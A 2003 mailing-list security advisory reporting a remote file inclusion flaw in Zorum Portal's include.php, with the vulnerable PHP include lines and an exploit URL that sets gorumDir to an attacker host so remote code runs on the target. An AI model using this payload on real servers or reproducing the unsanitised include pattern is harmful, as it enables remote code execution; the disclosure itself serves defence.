Zorum Portal (PHP)

From: MGhz (magasat_private)
Date: Wed Jan 22 2003 - 11:45:26 PST

  • Next message: securityat_private: "Security Update: [CSSA-2003-005.0] Linux: canna buffer overflow and denial of service" 

    
 ('binary' encoding is not supported, stored as-is)
Version : 3.0;3.1;3.2
Website : http://zorum.phpoutsourcing.com/
Problem : Include file


File:
---------------------------------
include.php
---------------------------------

PHP Code:
---------------------------------
[...]
include("$gorumDir/generformlib_multipleselection.php");
include("$gorumDir/generformlib_groupselection.php");
include("$gorumDir/generformlib_filebutton.php");
include("$gorumDir/group.php");
[...]
---------------------------------

Exploit :
---------------------------------
http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
-->
include http://[attacker]/group.php on remote server
---------------------------------

--
magasat_private

    

    



    

    


This archive was generated by hypermail 2b30 
: Wed Jan 22 2003 - 13:30:59 PST